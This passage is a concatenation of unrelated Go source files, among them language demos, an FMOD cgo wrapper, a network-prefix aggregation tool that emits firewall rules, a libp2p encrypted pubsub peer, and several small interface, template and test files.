	w.Header().Add(headerContentType, contentTypeJSON)
	w.WriteHeader(statusCode)
	// Best-effort body write; nothing useful to do if the client is gone.
	buf.WriteTo(w)
}
|
package main
import "fmt"
// zeroval demonstrates pass-by-value: it zeroes only its local copy, so the
// caller's variable is untouched.
func zeroval(ival int) {
	ival = 0
}
// zeroptr demonstrates passing a pointer: writing through the dereferenced
// pointer mutates the caller's variable.
func zeroptr(iptr *int) {
	// set value of dereferenced pointer
	*iptr = 0
}
// main contrasts pass-by-value (zeroval) with pass-by-pointer (zeroptr).
func main() {
	i := 1
	fmt.Println("initial:", i)

	zeroval(i)
	fmt.Println("zeroval:", i)

	// pass in the memory address of (pointer to) `i`
	zeroptr(&i)
	fmt.Println("zeroptr:", i)
	fmt.Println("it's still zero:", i)

	fmt.Println("pointer:", &i)
}
|
package main
import "fmt"
// USB is a named device that can also connect (embeds Connecter).
type USB interface {
	Name() string
	Connecter
}

// Connecter is anything that can establish a connection.
type Connecter interface {
	Connect()
}
// PhoneConnecter is a concrete USB device identified by name.
type PhoneConnecter struct {
	name string
}

// Name returns the connecter's name.
func (pc PhoneConnecter) Name() string {
	return pc.name
}

// Connect prints a connection message for the device.
func (pc PhoneConnecter) Connect() {
	fmt.Println("connect:", pc.name)
}
// main connects a PhoneConnecter through the USB interface and then
// disconnects it via the type-switching helper.
func main() {
	var usb USB = PhoneConnecter{name: "name"}
	usb.Connect()
	Disconnect(usb)
}
// Disconnect reports the disconnection of a device. It type-switches on the
// concrete type so that PhoneConnecter values get a named message; anything
// else gets a generic one.
func Disconnect(usb interface{}) {
	switch v := usb.(type) {
	case PhoneConnecter:
		fmt.Println("disconnect:", v.name)
	default:
		// Typo fix: message previously read "unkown decive".
		fmt.Println("unknown device")
	}
}
|
package lowlevel
/*
#include <fmod.h>
*/
import "C"
import "unsafe"
// Geometry wraps an FMOD geometry object (occlusion polygons for 3D sound).
type Geometry struct {
	cptr *C.FMOD_GEOMETRY
}

/*
'Geometry' API
*/

// Release frees the underlying FMOD geometry object; the wrapper must not be
// used afterwards.
func (g *Geometry) Release() error {
	res := C.FMOD_Geometry_Release(g.cptr)
	return errs[res]
}

/*
Polygon manipulation.
*/

// AddPolygon adds a polygon with the given occlusion factors to the geometry
// object and writes its index through polygonindex on the C side.
// NOTE(review): FMOD_Geometry_AddPolygon takes an array of numvertices
// vertices, but this wrapper passes the address of a single Vector — confirm
// whether numvertices > 1 can ever be used safely through this signature.
func (g *Geometry) AddPolygon(directocclusion, reverbocclusion float64, doublesided bool, numvertices int, vertices Vector, polygonindex int) error {
	cvertices := vertices.toC()
	cpolygonindex := C.int(polygonindex)
	res := C.FMOD_Geometry_AddPolygon(g.cptr, C.float(directocclusion), C.float(reverbocclusion), getBool(doublesided), C.int(numvertices), &cvertices, &cpolygonindex)
	return errs[res]
}
// NumPolygons returns the number of polygons stored in the geometry object.
func (g *Geometry) NumPolygons() (int, error) {
	var numpolygons C.int
	res := C.FMOD_Geometry_GetNumPolygons(g.cptr, &numpolygons)
	return int(numpolygons), errs[res]
}

// MaxPolygons returns the maximum polygon and vertex counts configured for
// this geometry object.
func (g *Geometry) MaxPolygons() (int, int, error) {
	var maxpolygons, maxvertices C.int
	res := C.FMOD_Geometry_GetMaxPolygons(g.cptr, &maxpolygons, &maxvertices)
	return int(maxpolygons), int(maxvertices), errs[res]
}

// PolygonNumVertices returns the number of vertices in the polygon at index.
func (g *Geometry) PolygonNumVertices(index int) (int, error) {
	var numvertices C.int
	res := C.FMOD_Geometry_GetPolygonNumVertices(g.cptr, C.int(index), &numvertices)
	return int(numvertices), errs[res]
}

// SetPolygonVertex overwrites one vertex of the polygon at index.
func (g *Geometry) SetPolygonVertex(index, vertexindex int, vertex Vector) error {
	cvertex := vertex.toC()
	res := C.FMOD_Geometry_SetPolygonVertex(g.cptr, C.int(index), C.int(vertexindex), &cvertex)
	return errs[res]
}

// PolygonVertex returns one vertex of the polygon at index.
func (g *Geometry) PolygonVertex(index, vertexindex int) (Vector, error) {
	var cvertex C.FMOD_VECTOR
	var vertex Vector
	res := C.FMOD_Geometry_GetPolygonVertex(g.cptr, C.int(index), C.int(vertexindex), &cvertex)
	vertex.fromC(cvertex)
	return vertex, errs[res]
}

// SetPolygonAttributes sets the occlusion factors and double-sided flag of
// the polygon at index.
func (g *Geometry) SetPolygonAttributes(index int, directocclusion, reverbocclusion float64, doublesided bool) error {
	res := C.FMOD_Geometry_SetPolygonAttributes(g.cptr, C.int(index), C.float(directocclusion), C.float(reverbocclusion), getBool(doublesided))
	return errs[res]
}

// PolygonAttributes returns the occlusion factors and double-sided flag of
// the polygon at index.
func (g *Geometry) PolygonAttributes(index int) (float64, float64, bool, error) {
	var directocclusion, reverbocclusion C.float
	var doublesided C.FMOD_BOOL
	res := C.FMOD_Geometry_GetPolygonAttributes(g.cptr, C.int(index), &directocclusion, &reverbocclusion, &doublesided)
	return float64(directocclusion), float64(reverbocclusion), setBool(doublesided), errs[res]
}
/*
Object manipulation.
*/

// SetActive enables or disables processing of this geometry object.
func (g *Geometry) SetActive(active bool) error {
	res := C.FMOD_Geometry_SetActive(g.cptr, getBool(active))
	return errs[res]
}

// IsActive reports whether the geometry object is currently active.
func (g *Geometry) IsActive() (bool, error) {
	var active C.FMOD_BOOL
	res := C.FMOD_Geometry_GetActive(g.cptr, &active)
	return setBool(active), errs[res]
}

// SetRotation orients the geometry object using forward and up vectors.
func (g *Geometry) SetRotation(forward, up Vector) error {
	cforward := forward.toC()
	cup := up.toC()
	res := C.FMOD_Geometry_SetRotation(g.cptr, &cforward, &cup)
	return errs[res]
}

// Rotation returns the object's forward and up orientation vectors.
func (g *Geometry) Rotation() (Vector, Vector, error) {
	var cforward, cup C.FMOD_VECTOR
	var forward, up Vector
	res := C.FMOD_Geometry_GetRotation(g.cptr, &cforward, &cup)
	forward.fromC(cforward)
	up.fromC(cup)
	return forward, up, errs[res]
}

// SetPosition moves the geometry object to the given position.
func (g *Geometry) SetPosition(position Vector) error {
	cposition := position.toC()
	res := C.FMOD_Geometry_SetPosition(g.cptr, &cposition)
	return errs[res]
}

// Position returns the geometry object's current position.
func (g *Geometry) Position() (Vector, error) {
	var cposition C.FMOD_VECTOR
	var position Vector
	res := C.FMOD_Geometry_GetPosition(g.cptr, &cposition)
	position.fromC(cposition)
	return position, errs[res]
}

// SetScale sets the per-axis scale of the geometry object.
func (g *Geometry) SetScale(scale Vector) error {
	cscale := scale.toC()
	res := C.FMOD_Geometry_SetScale(g.cptr, &cscale)
	return errs[res]
}

// Scale returns the per-axis scale of the geometry object.
func (g *Geometry) Scale() (Vector, error) {
	var cscale C.FMOD_VECTOR
	var scale Vector
	res := C.FMOD_Geometry_GetScale(g.cptr, &cscale)
	scale.fromC(cscale)
	return scale, errs[res]
}

// Save is not implemented yet; it always returns ErrNoImpl.
func (g *Geometry) Save(data *interface{}, datasize *C.int) error {
	//FMOD_RESULT F_API FMOD_Geometry_Save(FMOD_GEOMETRY *geometry, void *data, int *datasize);
	return ErrNoImpl
}
/*
Userdata set/get.
*/

// SetUserData attaches an arbitrary user value to the geometry object.
// NOTE(review): the interface{} is reinterpreted through unsafe.Pointer and
// the address of a stack-local is handed to C — this looks fragile with
// respect to Go's garbage collector; confirm intended usage before relying
// on it.
func (g *Geometry) SetUserData(userdata interface{}) error {
	data := *(*[]*C.char)(unsafe.Pointer(&userdata))
	res := C.FMOD_Geometry_SetUserData(g.cptr, unsafe.Pointer(&data))
	return errs[res]
}

// UserData retrieves the user value that was set by calling the
// "Geometry.SetUserData" function.
// NOTE(review): the pointer returned by FMOD is dereferenced as an
// interface{}; if no userdata was ever set this is a nil dereference —
// confirm callers guard against that.
func (g *Geometry) UserData() (interface{}, error) {
	var userdata *interface{}
	cUserdata := unsafe.Pointer(userdata)
	res := C.FMOD_Geometry_GetUserData(g.cptr, &cUserdata)
	return *(*interface{})(cUserdata), errs[res]
}
|
/*
* aggro
*
* This is a utility for acquiring all the network prefixes announced by a list
* of autonomous systems, aggregating prefixes into less specific ones and
* removing prefixes that are already covered by less specific prefix. The final
* list of prefixes should be the shortest list of prefixes that covers all the
* address ranges advertised by the ASes.
*
* Additionally, prefixes can also be queried by association to a country specified
* by an ISO-3166 alpha-2 country code.
*
* Please see README.md before using this utility.
*
* This is my first Go project - please be gentle. :D This is more or less a
* direct conversion from my node.js script into golang with some added features
* and configurability.
*
* Copyright (c) 2017 Noora Halme - please see LICENSE.md
*/
package main
import (
"flag"
"fmt"
"strconv"
"log"
"regexp"
)
// Command-line options, populated by flag parsing in main.
var verbosityLevel int;
var outputFormat string;
var queryType string;

// Output verbosity levels, compared against verbosityLevel.
const OUTPUT_QUIET = 0
const OUTPUT_NORMAL = 1
const OUTPUT_EXTRA = 2
const OUTPUT_DEBUG = 3
// net2i converts a network prefix (address u, length p) into its index in
// the flattened binary trie: the offset of level p (2^p - 1) plus the top
// p bits of the address.
func net2i(u uint32, p uint8) uint32 {
	levelOffset := uint32(1)<<p - 1
	return levelOffset + u>>(32-p)
}
// i2net converts a trie index u at prefix length p back into the network
// prefix address. The root (p == 0) maps to address 0.
func i2net(u uint32, p uint8) uint32 {
	if p == 0 {
		return 0
	}
	next := u + 1
	return (next << (32 - p)) & 0xffffffff
}
// i2plen recovers the prefix length encoded by trie index u: the trie level
// the index sits on, i.e. the largest p with u >= 2^p - 1.
func i2plen(u uint32) uint32 {
	for p := uint32(1); p <= 32; p++ {
		if u < (1<<p)-1 {
			return p - 1
		}
	}
	return 0
}
// u32toipv4 formats a uint32 IPv4 address in dotted-quad notation.
func u32toipv4(u uint32) string {
	octets := [4]uint32{u >> 24 & 0xff, u >> 16 & 0xff, u >> 8 & 0xff, u & 0xff}
	return fmt.Sprintf("%d.%d.%d.%d", octets[0], octets[1], octets[2], octets[3])
}
///////////////////////////////////////////////////////////////////////////////
//
// main program
//
// main parses the command line, loads the IPv4/IPv6 prefixes announced by the
// requested ASNs (or associated with the requested country codes), aggregates
// the IPv4 prefixes in a flat breadth-first trie, and prints the result in
// the selected firewall/router format.
func main() {
	shortestPrefix := 32
	longestPrefix := 0
	trie := make([]uint8, 1<<25) // gaah
	ipv4Prefixes := make([]string, 0)
	ipv6Prefixes := make([]string, 0)
	asList := make([]int, 0)
	ccList := make([]string, 0)

	// read flags from command line
	flag.StringVar(&outputFormat, "o", "ipt", "Output format <ipt|nft|pf|junos|plain>")
	flag.IntVar(&verbosityLevel, "v", 1, "Output verbosity <0..3>") // typo fix: was "vebosity"
	flag.StringVar(&queryType, "q", "as", "Query prefixes by ASNs or ISO country codes <as|cc>")
	flag.Parse()
	args := flag.Args()
	if len(args) < 1 {
		flag.PrintDefaults()
		return
	}

	if queryType == "as" {
		// read ASNs from the command line; non-numeric arguments are ignored
		for i := 0; i < len(args); i++ {
			as, err := strconv.Atoi(args[i])
			if err == nil {
				asList = append(asList, as)
			}
		}
		// fetch network prefixes for all AS numbers specified on the command line
		asnText := ""
		for i := 0; i < len(asList); i++ {
			ann4, ann6, err := getASPrefixes(asList[i], &ipv4Prefixes, &ipv6Prefixes)
			if err != nil {
				log.Fatal("Failed to query prefixes for AS - aborting")
			}
			asnText = fmt.Sprintf("%s%d ", asnText, asList[i])
			if verbosityLevel > OUTPUT_NORMAL {
				fmt.Printf("# AS%d announces %d IPv4 prefixes and %d IPv6 prefixes\n", asList[i], ann4, ann6)
			}
		}
		if verbosityLevel > OUTPUT_QUIET {
			fmt.Printf("# Successfully queried ASNs: %s\n", asnText)
		}
	} else {
		// args has ISO country codes
		ccText := ""
		for i := 0; i < len(args); i++ {
			if len(args[i]) != 2 {
				// invalid country code
				log.Fatal("Invalid country code specified")
			}
			ccList = append(ccList, args[i])
			// query the country from RIPEstat
			ann4, ann6, err := getCountryPrefixes(args[i], &ipv4Prefixes, &ipv6Prefixes)
			if err != nil {
				log.Fatal("Failed to query prefixes for country - aborting")
			}
			ccText = fmt.Sprintf("%s%s ", ccText, args[i])
			if verbosityLevel > OUTPUT_NORMAL {
				fmt.Printf("# Country '%s' is associated with %d IPv4 prefixes and %d IPv6 prefixes\n", args[i], ann4, ann6)
			}
		}
		if verbosityLevel > OUTPUT_QUIET {
			fmt.Printf("# Successfully queried CCs: %s\n", ccText)
		}
	}

	// all network prefixes are now loaded - time to start aggregating them!
	if verbosityLevel > OUTPUT_QUIET {
		fmt.Printf("# Found a total of %d IPv4 prefixes and %d IPv6 prefixes\n", len(ipv4Prefixes), len(ipv6Prefixes))
	}

	// we'll aggregate prefixes by first arranging them into a trie. a node marked 0 means
	// no prefix, 1-32 means an exact or more specific prefix exists.
	// a node with an exact prefix is a leaf node in the tree.
	//
	// because generally no longer prefixes than /24 are accepted on the route table,
	// we can brute force it and allocate a 2^25 byte buffer to store our trie
	// breadth-first. storing as nodes with references would of course consume less
	// memory.
	//
	// PERF FIX: both expressions are constant, so compile them once here
	// instead of on every loop iteration as before. The octet expression now
	// escapes its dots so they match only literal dots.
	prefixRE := regexp.MustCompile(`^([0-9.]{7,15})/([0-9]{1,2})$`)
	bytesRE := regexp.MustCompile(`^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$`)
	for i := 0; i < len(ipv4Prefixes); i++ {
		prefixMatches := prefixRE.FindStringSubmatch(ipv4Prefixes[i])
		if len(prefixMatches) != 3 {
			// BUG FIX: a malformed prefix was previously skipped silently
			// because this fatal was attached to the (unreachable) regex
			// compile-error branch.
			log.Fatal("Invalid IPv4 prefix")
		}
		prefixLen, err := strconv.Atoi(prefixMatches[2])
		if err != nil {
			log.Fatal("Invalid prefix length")
		}
		// skip longer prefixes than /24 - they wouldn't be routed anyway
		if prefixLen > 24 {
			if verbosityLevel > OUTPUT_NORMAL {
				fmt.Printf("# Skipping prefix %s for being longer than 24 bits\n", ipv4Prefixes[i])
			}
			continue
		}
		// extract individual bytes from the prefix
		bytesMatches := bytesRE.FindStringSubmatch(prefixMatches[1])
		if len(bytesMatches) == 5 {
			// prefix looks ok, convert to uint32
			var network uint32
			for j := 0; j < 4; j++ {
				pb, err := strconv.Atoi(bytesMatches[1+j])
				if err == nil && pb >= 0 && pb < 256 {
					network = network | (uint32(pb) << uint((3-j)*8))
				}
			}
			if verbosityLevel == OUTPUT_DEBUG {
				fmt.Printf("# Prefix %s (0x%08x len %d) has index 0x%08x\n", ipv4Prefixes[i], network, prefixLen, net2i(network, uint8(prefixLen)))
			}
			// store the prefix into the trie, marking every level down to the
			// leaf with the shortest covering prefix length seen so far
			for k := 1; k <= prefixLen; k++ {
				offset := net2i(network, uint8(k))
				if trie[offset] == 0 || trie[offset] > uint8(prefixLen) {
					trie[offset] = uint8(prefixLen)
				}
			}
		}
		if prefixLen < shortestPrefix {
			shortestPrefix = prefixLen
		}
		if prefixLen > longestPrefix {
			longestPrefix = prefixLen
		}
	}
	if verbosityLevel > OUTPUT_QUIET {
		fmt.Printf("# Shortest IPv4 prefix is %d bits and longest %d bits\n", shortestPrefix, longestPrefix)
	}

	// now traverse the trie, starting from the longest observed prefix length. if a node
	// and it's sibling are leaf nodes, they can be set to zero and the parent changed to a leaf.
	for p := longestPrefix; p >= shortestPrefix; p-- {
		for i := net2i(0, uint8(p)); i < net2i(0, uint8(p+1)); i += 2 {
			if trie[i] == uint8(p) && trie[i+1] == uint8(p) {
				if verbosityLevel > OUTPUT_NORMAL {
					fmt.Printf("# Aggregating %s/%d and %s/%d to %s/%d\n",
						u32toipv4(i2net(i, uint8(p))), p,
						u32toipv4(i2net(i+1, uint8(p))), p,
						u32toipv4(i2net(i>>1, uint8(p-1))), (p - 1))
				}
				trie[i] = 0
				trie[i+1] = 0
				trie[i>>1] = uint8(p - 1)
				if shortestPrefix > p-1 {
					shortestPrefix = p - 1
				}
			}
		}
		// scan through the prefixes again, this time to see if a less specific
		// prefix exists.
		for i := net2i(0, uint8(p)); i < net2i(0, uint8(p+1)); i++ {
			if trie[i] == uint8(p) {
				for pp := 1; pp <= (p - shortestPrefix); pp++ {
					pi := net2i(i2net(i, uint8(p)), uint8(p-pp))
					if trie[pi] == uint8(p-pp) {
						if verbosityLevel > OUTPUT_NORMAL {
							fmt.Printf("# Removing prefix %s/%d because less specific prefix %s/%d exists\n",
								u32toipv4(i2net(i, uint8(p))), p,
								u32toipv4(i2net(pi, uint8(p-pp))), (p - pp))
						}
						trie[i] = 0
						break
					}
				}
			}
		}
	}

	// finally, traverse the trie once more time to collect all remaining leaf nodes. they are
	// used to generate the final list of prefixes
	aggregatedPrefixes := make([]string, 0)
	for p := longestPrefix; p >= shortestPrefix; p-- {
		for i := net2i(0, uint8(p)); i < net2i(0, uint8(p+1)); i++ {
			if trie[i] == uint8(p) {
				aggregatedPrefixes = append(aggregatedPrefixes, fmt.Sprintf("%s/%d", u32toipv4(i2net(i, uint8(p))), p))
			}
		}
	}
	if verbosityLevel > OUTPUT_QUIET {
		fmt.Printf("# Final list contains %d IPv4 prefixes\n", len(aggregatedPrefixes))
	}

	// now output the final list of prefixes collected from the trie
	listName := queryType // "as" or "cc"
	switch queryType {
	case "as":
		for i := 0; i < len(asList); i++ {
			listName = fmt.Sprintf("%s-%d", listName, asList[i])
		}
	case "cc":
		for i := 0; i < len(ccList); i++ {
			listName = fmt.Sprintf("%s-%s", listName, ccList[i])
		}
	}
	switch outputFormat {
	case "ipt":
		outputIptables(listName, &aggregatedPrefixes)
	case "nft":
		outputNptables(listName, &aggregatedPrefixes)
	case "pf":
		outputPf(listName, &aggregatedPrefixes)
	case "junos":
		outputJunos(listName, &aggregatedPrefixes)
	case "plain":
		outputPlain(&aggregatedPrefixes)
	}
}
|
package main
import (
"bufio"
"context"
"encoding/json"
"fmt"
"os"
"sync"
"github.com/gtank/cryptopasta"
"github.com/fentec-project/gofe/abe"
"github.com/joho/godotenv"
"github.com/libp2p/go-libp2p"
dht "github.com/libp2p/go-libp2p-kad-dht"
pubsub "github.com/libp2p/go-libp2p-pubsub"
"github.com/libp2p/go-libp2p/core/host"
"github.com/libp2p/go-libp2p/core/peer"
"github.com/multiformats/go-multiaddr"
drouting "github.com/libp2p/go-libp2p/p2p/discovery/routing"
dutil "github.com/libp2p/go-libp2p/p2p/discovery/util"
)
// config holds the parsed command-line configuration (populated in main via
// ParseFlags).
var config Config

// AbePeerPara bundles the FAME attribute-based-encryption material this peer
// uses: the scheme instance, the master public/secret keys and the monotone
// span program describing the access policy.
type AbePeerPara struct {
	abefame *abe.FAME
	mpk     *abe.FAMEPubKey
	msk     *abe.FAMESecKey
	msp     *abe.MSP
}

// peerAbePara is populated once at startup by getAbePara.
var peerAbePara AbePeerPara
// mustUnmarshalEnv JSON-decodes the value of the environment variable name
// into out and panics if the value is missing or malformed.
func mustUnmarshalEnv(name string, out interface{}) {
	if err := json.Unmarshal([]byte(os.Getenv(name)), out); err != nil {
		panic(err)
	}
}

// getAbePara loads the FAME ABE parameters (scheme, master keys and policy
// MSP) from the JSON blobs stored in ../AbeSetup/.env. It panics on any
// missing or invalid value, since the peer cannot run without them.
func getAbePara() AbePeerPara {
	var abepara AbePeerPara
	if err := godotenv.Load("../AbeSetup/.env"); err != nil {
		panic(err)
	}
	// The four stanzas below were previously copy-pasted; the helper keeps
	// the behavior (panic on error) identical.
	mustUnmarshalEnv("ABEFAME", &abepara.abefame)
	mustUnmarshalEnv("MPK", &abepara.mpk)
	mustUnmarshalEnv("MSK", &abepara.msk)
	mustUnmarshalEnv("MSP", &abepara.msp)
	return abepara
}
// main wires the peer together: it loads the ABE parameters, generates a
// fresh AES key, starts a libp2p host with gossipsub, joins the configured
// topic, then pumps stdin to the topic while printing everything received.
func main() {
	config, _ = ParseFlags()
	ctx := context.Background()
	peerAbePara = getAbePara()
	// Symmetric key used to encrypt published messages; it can be shared with
	// other peers via sendKey (ABE-wrapped).
	absKey := cryptopasta.NewEncryptionKey()
	h, err := libp2p.New(libp2p.ListenAddrs([]multiaddr.Multiaddr(config.ListenAddresses)...))
	if err != nil {
		panic(err)
	}
	// Peer discovery runs in the background while pubsub is set up.
	go discoverPeers(ctx, h)
	ps, err := pubsub.NewGossipSub(ctx, h)
	if err != nil {
		panic(err)
	}
	topic, err := ps.Join(config.TopicString)
	if err != nil {
		panic(err)
	}
	// Console input is published from a separate goroutine ...
	go streamConsoleTo(ctx, topic, absKey)
	sub, err := topic.Subscribe()
	if err != nil {
		panic(err)
	}
	// ... while the main goroutine blocks forever printing incoming messages.
	printMessagesFrom(ctx, sub)
}
// initDHT starts a Kademlia DHT on h, bootstraps it, and dials every
// configured bootstrap peer in parallel, returning once all attempts finish.
func initDHT(ctx context.Context, h host.Host) *dht.IpfsDHT {
	// Start a DHT, for use in peer discovery. We can't just make a new DHT
	// client because we want each peer to maintain its own local copy of the
	// DHT, so that the bootstrapping node of the DHT can go down without
	// inhibiting future peer discovery.
	kademliaDHT, err := dht.New(ctx, h)
	if err != nil {
		panic(err)
	}
	if err = kademliaDHT.Bootstrap(ctx); err != nil {
		panic(err)
	}
	var wg sync.WaitGroup
	for _, peerAddr := range config.BootstrapPeers {
		peerinfo, _ := peer.AddrInfoFromP2pAddr(peerAddr)
		wg.Add(1)
		go func() {
			defer wg.Done()
			// A failed dial is only a warning: other bootstrap peers may
			// still succeed.
			if err := h.Connect(ctx, *peerinfo); err != nil {
				fmt.Println("Bootstrap warning:", err)
			}
		}()
	}
	wg.Wait()
	return kademliaDHT
}
// discoverPeers advertises our topic string on the DHT and keeps searching
// for other peers advertising the same topic until at least one connection
// succeeds.
func discoverPeers(ctx context.Context, h host.Host) {
	kademliaDHT := initDHT(ctx, h)
	routingDiscovery := drouting.NewRoutingDiscovery(kademliaDHT)
	dutil.Advertise(ctx, routingDiscovery, config.TopicString)
	// Look for others who have announced and attempt to connect to them
	anyConnected := false
	for !anyConnected {
		fmt.Println("Searching for peers...")
		peerChan, err := routingDiscovery.FindPeers(ctx, config.TopicString)
		if err != nil {
			panic(err)
		}
		for peer := range peerChan {
			if peer.ID == h.ID() {
				continue // No self connection
			}
			err := h.Connect(ctx, peer)
			if err != nil {
				// Failed dials are expected while the network converges;
				// ignore them and keep trying other peers.
				// fmt.Println("Failed connecting to ", peer.ID.Pretty(), ", error:", err)
			} else {
				fmt.Println("Connected to:", peer.ID.Pretty())
				anyConnected = true
			}
		}
	}
	fmt.Println("Peer discovery complete")
}
// sendKey ABE-encrypts the AES key under the peer's MSP policy and publishes
// the JSON-encoded ciphertext to the topic, so only peers whose attributes
// satisfy the policy can recover the key.
func sendKey(ctx context.Context, topic *pubsub.Topic, key *[32]byte) {
	// NOTE(review): Encrypt and Marshal errors are silently discarded here;
	// a failure publishes an empty/partial payload.
	sendData, _ := peerAbePara.abefame.Encrypt(string(key[:]), peerAbePara.msp, peerAbePara.mpk)
	sendDataJson, _ := json.Marshal(sendData)
	sendDatastr := string(sendDataJson)
	err := topic.Publish(ctx, []byte(sendDatastr))
	if err != nil {
		fmt.Println("### Publish error:", err)
	}
}
// streamSend publishes the first line of every file in the configured message
// directory, AES-encrypted with key, to the topic.
func streamSend(ctx context.Context, topic *pubsub.Topic, key *[32]byte) {
	dir, err := os.Open(config.MessageDirPath)
	if err != nil {
		// BUG FIX: this diagnostic was previously placed after panic(err)
		// and therefore unreachable.
		fmt.Println(config.MessageDirPath)
		panic(err)
	}
	defer dir.Close()
	files, err := dir.Readdir(0)
	if err != nil {
		panic(err)
	}
	for _, file := range files {
		// BUG FIX: file closes were previously deferred inside this loop, so
		// every file stayed open until streamSend returned; the helper closes
		// each one as soon as it has been published.
		publishFileLine(ctx, topic, key, config.MessageDirPath+"/"+file.Name())
	}
}

// publishFileLine reads the first '\n'-terminated line of the file at
// filePath, encrypts it with key and publishes it to the topic.
func publishFileLine(ctx context.Context, topic *pubsub.Topic, key *[32]byte, filePath string) {
	f, err := os.Open(filePath)
	if err != nil {
		panic(err)
	}
	defer f.Close()
	line, err := bufio.NewReader(f).ReadString('\n')
	if err != nil {
		panic(err)
	}
	enc, err := cryptopasta.Encrypt([]byte(line), key)
	if err != nil {
		panic(err)
	}
	if err = topic.Publish(ctx, []byte(enc)); err != nil {
		fmt.Println("### Publish error:", err)
	}
}
// streamConsoleTo reads lines from stdin forever. Two commands are special:
// "send AES Key" publishes the ABE-wrapped symmetric key and "send msg kdd"
// publishes the message directory contents; any other line is AES-encrypted
// with key and published as-is.
func streamConsoleTo(ctx context.Context, topic *pubsub.Topic, key *[32]byte) {
	reader := bufio.NewReader(os.Stdin)
	for {
		s, err := reader.ReadString('\n')
		if err != nil {
			// stdin closed or unreadable: nothing left to stream.
			panic(err)
		}
		if s == "send AES Key\n" {
			sendKey(ctx, topic, key)
		} else if s == "send msg kdd\n" {
			streamSend(ctx, topic, key)
		} else {
			// sendData, _ := peerAbePara.abefame.Encrypt(s, peerAbePara.msp, peerAbePara.mpk)
			// sendDataJson, _ := json.Marshal(sendData)
			// sendDatastr := string(sendDataJson)
			sendDatastr, err := cryptopasta.Encrypt([]byte(s), key)
			if err != nil {
				panic(err)
			}
			err = topic.Publish(ctx, []byte(sendDatastr))
			if err != nil {
				fmt.Println("### Publish error:", err)
			}
		}
	}
}
// printMessagesFrom blocks forever, printing each message received on the
// subscription together with the peer it came from.
func printMessagesFrom(ctx context.Context, sub *pubsub.Subscription) {
	for {
		m, err := sub.Next(ctx)
		if err != nil {
			panic(err)
		}
		fmt.Println(m.ReceivedFrom, ": ", string(m.Message.Data))
		// inputBytes := []byte(string(m.Message.Data))
		// ioutil.WriteFile("output.txt", inputBytes, 0644)
	}
}
|
//
// IProxy.go
// PureMVC Go Multicore
//
// Copyright(c) 2019 Saad Shams <saad.shams@puremvc.org>
// Your reuse is governed by the Creative Commons Attribution 3.0 License
//
package interfaces
/*
The interface definition for a PureMVC Proxy.
In PureMVC, IProxy implementors assume these responsibilities:
* Implement a common method which returns the name of the Proxy.
* Provide methods for setting and getting the data object.
Additionally, IProxys typically:
* Maintain references to one or more pieces of model data.
* Provide methods for manipulating that data.
* Generate INotifications when their model data changes.
* Expose their name as a public static const called NAME, if they are not instantiated multiple times.
* Encapsulate interaction with local or remote services used to fetch and persist model data.
*/
type IProxy interface {
	INotifier

	/*
	  GetProxyName returns the Proxy name.
	*/
	GetProxyName() string

	/*
	  SetData sets the data object held by the Proxy.
	*/
	SetData(data interface{})

	/*
	  GetData returns the data object held by the Proxy.
	*/
	GetData() interface{}

	/*
	  OnRegister is called by the Model when the Proxy is registered.
	*/
	OnRegister()

	/*
	  OnRemove is called by the Model when the Proxy is removed.
	*/
	OnRemove()
}
|
package model
// RelationType wraps a Relation value for JSON (de)serialization.
type RelationType struct {
	Relation Relation `json:"relation"`
}

// Relation enumerates the follow state between two users; the zero value is
// NotFollowing.
type Relation int

const (
	NotFollowing Relation = iota // 0
	Following                    // 1
	NotAccepted                  // 2 — presumably a pending/unaccepted follow request; confirm against callers
	Blocked                      // 3
	Blocking                     // 4
)
|
package util
// TemplatePartialImport is a printf template for an MDX import statement:
// args are the partial's identifier and its path.
const TemplatePartialImport = `
import %s from "%s"`

// TemplatePartialUse renders a self-closing JSX usage of a partial.
const TemplatePartialUse = `<%s />
`

// TemplatePartialUseConfig renders a self-closing JSX usage of a config
// partial (currently identical in shape to TemplatePartialUse).
const TemplatePartialUseConfig = `<%s />
`

// TemplateConfigField renders one expandable documentation entry for a
// configuration field (name, required flag, type, default, enum, anchor,
// summary and body).
const TemplateConfigField = `
<details className="config-field" data-expandable="%t"%s>
<summary>
%s` + "`%s`" + ` <span className="config-field-required" data-required="%t">required</span> <span className="config-field-type">%s</span> <span className="config-field-default">%s</span> <span className="config-field-enum">%s</span> {#%s}
%s
</summary>
%s
</details>
`

// TemplateFunctionRef renders one expandable documentation entry for a
// function reference (name, type, enum, return default, anchor, summary and
// body); the required marker is repurposed as a "pipeline only" badge.
const TemplateFunctionRef = `
<details className="config-field -function" data-expandable="%t"%s>
<summary>
%s` + "`%s`" + ` <span className="config-field-type">%s</span> <span className="config-field-enum">%s</span> <span className="config-field-default -return">%s</span> <span className="config-field-required" data-required="%t">pipeline only</span> {#%s}
%s
</summary>
%s
</details>
`
|
package addition_test
import (
"testing"
"github.com/Charliekenney23/terraform-provider-math/internal/testacc"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
// dataSourceName is the Terraform address of the data source under test.
const dataSourceName = "data.math_addition.test"

// TestDataSource_basic applies configBasic and verifies that the
// math_addition data source echoes its operands and computes sum = 2 + 3.
func TestDataSource_basic(t *testing.T) {
	resource.ParallelTest(t, resource.TestCase{
		PreCheck:  func() { testacc.PreCheck(t) },
		Providers: testacc.Providers(),
		Steps: []resource.TestStep{
			{
				Config: configBasic,
				Check: resource.ComposeTestCheckFunc(
					resource.TestCheckResourceAttr(dataSourceName, "addend", "2"),
					resource.TestCheckResourceAttr(dataSourceName, "augend", "3"),
					resource.TestCheckResourceAttr(dataSourceName, "sum", "5"),
				),
			},
		},
	})
}
// configBasic is the Terraform configuration exercised by
// TestDataSource_basic: a single math_addition data source with fixed
// operands.
const configBasic = `
data "math_addition" "test" {
  addend = 2
  augend = 3
}`
|
package rdb_test
import (
"fmt"
"sync"
"testing"
)
import (
"github.com/jinzhu/gorm"
"github.com/stretchr/testify/assert"
"github.com/xozrc/cqrs/eventsourcing"
. "github.com/xozrc/cqrs/eventsourcing/rdb"
)
// Keep the fmt import alive for ad-hoc debugging prints.
var _ = fmt.Print

// MySQL connection parameters for the integration-test database.
const (
	dialect  = "mysql"
	user     = "root"
	password = "root"
	host     = "127.0.0.1:3306"
	dbName   = "event_store_test"
	charset  = "utf8"
)

// partitionKey is the event-stream partition used by all tests in this file.
const (
	partitionKey = "test"
)

// version tracks the highest event version seen/saved so far.
var (
	version int64 = 0
)

